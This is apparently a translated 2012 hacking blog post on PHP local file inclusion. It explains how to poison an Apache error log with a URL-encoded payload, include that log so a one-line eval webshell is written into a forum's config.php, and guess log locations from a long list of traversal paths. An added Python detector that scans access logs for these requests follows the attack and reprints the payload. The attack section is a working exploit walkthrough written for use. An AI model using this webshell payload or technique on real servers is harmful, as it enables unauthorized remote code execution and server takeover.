PHP include: writing a webshell through the Apache log

Posted on 2012-9-15 14:27:40
Since the method above is very impractical (in my testing the logs were routinely tens of megabytes, which takes all the fun out of it), let's think one step further: write a genuinely usable webshell, which is also far better than the painfully slow method above.

For example, take the same one-line trojan again:

<?eval($_POST[cmd]);?>

By now you have probably thought of it: this is a pretty good approach. Read on, because how to write it becomes the problem. Use this statement: fopen opens the file /home/virtual/www.xxx.com/forum/config.php, then the one-line trojan server-side statement <?eval($_POST[cmd]);?> is written into it. Expressed as a PHP statement, that is:

<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
fclose($fp);?>   // write the one-line trojan statement into config.php

We submit this statement, let Apache record it in the error log, and then include the log; the shell is then written successfully. Remember that it must be converted to URL-encoded form or it will not work.
Converted, it becomes:

%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp
%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B
fclose%28%24fp%29%3B%3F%3E
We submit:

http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww
%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B
cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
With that, the error log now contains the line of code that writes the webshell.

Next we include the log, submitting:

http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log
The webshell is now written successfully: config.php contains the one-line trojan statement.
OK.
http://www.xxx.com/forum/config.php has become our webshell.
Connect to it with lanker's client and the host is yours.
PS: everything above assumes the directory permissions are writable; it must be -rwxrwxrwx (777) to proceed, and here the directories listed above are used directly to check that. Everything above is exploitation in the case where the log path is already known.

For other log paths you can guess, or refer to this list.
../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log
/var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/access_log
/var/log/error_log
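From the defender's side, the technique above leaves two distinctive requests in the access log: one whose percent-decoded target carries PHP code, and one whose include parameter points at a log path from the list above. The following script is an added example, not code from the original post; it scans Combined Log Format lines for both. The script name z.php, the parameter zizzy and the encoded payload come from the post; the sample log lines are constructed.

```python
import re
from urllib.parse import unquote
# Markers of the poisoning payload, checked after percent-decoding because the
# post stresses the request must be URL-encoded to be logged intact.
CODE_PATTERNS = [re.compile(r"<\?"),                               # PHP open tag
                 re.compile(r"\b(eval|fopen|fputs|fwrite|system)\s*\("),
                 re.compile(r"\$_(POST|GET|REQUEST)\[")]
# Log locations from the post's path list, seen as the value of an include parameter.
LOG_TARGET = re.compile(r"\.\./|/var/log/|/var/www/logs/|/usr/local/apache/logs/"
                        r"|/etc/httpd/logs/|(access|error)[_.]log")
REQUEST_RE = re.compile(r'"([A-Z]+ [^"]+ HTTP/[0-9.]+)"')  # request field of a CLF line

def percent_decode(s, rounds=3):
    """Decode repeatedly so a double-encoded payload is not missed."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s

def classify_request(request_line):
    """Tags for one request line: 'php_code', 'log_include', or an empty set."""
    parts = request_line.split()
    target = parts[1] if len(parts) >= 2 else request_line
    _, _, raw_query = target.partition("?")  # split on the raw '?' before decoding
    tags = set()
    if any(p.search(percent_decode(target)) for p in CODE_PATTERNS):
        tags.add("php_code")
    for pair in raw_query.split("&") if raw_query else []:
        if LOG_TARGET.search(percent_decode(pair.partition("=")[2])):
            tags.add("log_include")
    return tags

def scan_access_log(lines):
    """Return [(line_no, sorted tags)] for suspicious access-log lines."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        tags = classify_request(m.group(1)) if m else set()
        if tags:
            findings.append((n, sorted(tags)))
    return findings

# Constructed sample log: line 2 carries the post's URL-encoded payload, line 3 the log include.
SAMPLE_LOG = [
    '10.0.0.5 - - [15/Sep/2012:14:27:40 +0800] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [15/Sep/2012:14:28:01 +0800] "GET /%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E HTTP/1.1" 404 210 "-" "curl/7.20"',
    '10.0.0.9 - - [15/Sep/2012:14:28:30 +0800] "GET /z.php?zizzy=/home/virtual/logs/www-error_log HTTP/1.1" 200 3812 "-" "curl/7.20"',
    '10.0.0.7 - - [15/Sep/2012:14:29:00 +0800] "GET /z.php?zizzy=about HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]
```

The error log stores the request path already decoded (in its "File does not exist" message), so the same CODE_PATTERNS apply there without the decoding step. Any hit on both tags from one client within a short window is the full sequence the post describes and deserves an alert rather than a log entry.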